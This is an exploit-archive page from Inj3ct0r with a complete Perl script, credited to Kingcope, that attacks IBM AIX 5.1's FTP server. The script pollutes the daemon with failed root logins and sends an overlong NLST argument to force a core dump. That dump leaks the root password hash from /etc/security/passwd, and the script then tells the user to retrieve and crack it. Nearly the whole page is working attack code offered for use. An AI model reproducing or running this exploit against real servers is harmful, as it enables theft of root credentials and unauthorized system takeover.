AIX5l with FTP-Server Remote Root Hash Disclosure Exploit
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>AIX5l with FTP-Server Remote Root Hash Disclosure Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
AIX5l with FTP-Server Remote Root Hash Disclosure Exploit
=========================================================
### AIXCOREDUMP.PL —
### –== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =–
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED – SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010
use IO::Socket;
$|=1;
print "–== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =–n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwdn";
print "BY KINGCOPEn";
print "JULY 2010nn";
if ($#ARGV < 1) {
print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]n";
print "SAMPLES:n";
print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwdn";
print "USE GUEST ACCOUNT – NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25n";
exit;
}
$trgt = $ARGV[0];
$sock = IO::Socket::INET->new(PeerAddr => $trgt,
PeerPort => ‘21′,
Proto => ‘tcp’);
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/./,/gi;
if ($ARGV[2] eq "") {
$user = "ftp";
$pass = "c0deb4b3@roothash.com";
} else {
$user = $ARGV[2];
$passwd = $ARGV[3];
}
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $xn";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***n";
print "t$x";
print $sock "USER rootrn";
$x = <$sock>;
print "t$x";
print $sock "PASS sexyrn";
$x = <$sock>;
print "t$x";
}
print "*AIX EXPLOIT* ACCESSING FOLDER***n";
print $sock "USER $userrn";
$x = <$sock>;
print "t$x";
print $sock "PASS $passwdrn";
$x = <$sock>;
print "t$x";
if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***n";
print $sock "CWD pubrn";
$x = <$sock>;
print "t$x";
}
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "rn";
$x = <$sock>;
print "t$x";
print "*AIX EXPLOIT* TRIGGERING COREDUMP***n";
print $sock "NLST ~" . "A" x 5000 . "rn";
$x = <$sock>;
while(<$sock>) {
print;
}
print "*AIX EXPLOIT* (SUCCESS)***n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => ‘tcp’, Listen => 1);
die "Could not create socket: $!n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
## CHEERIO!
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-18]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13398
Leave a Reply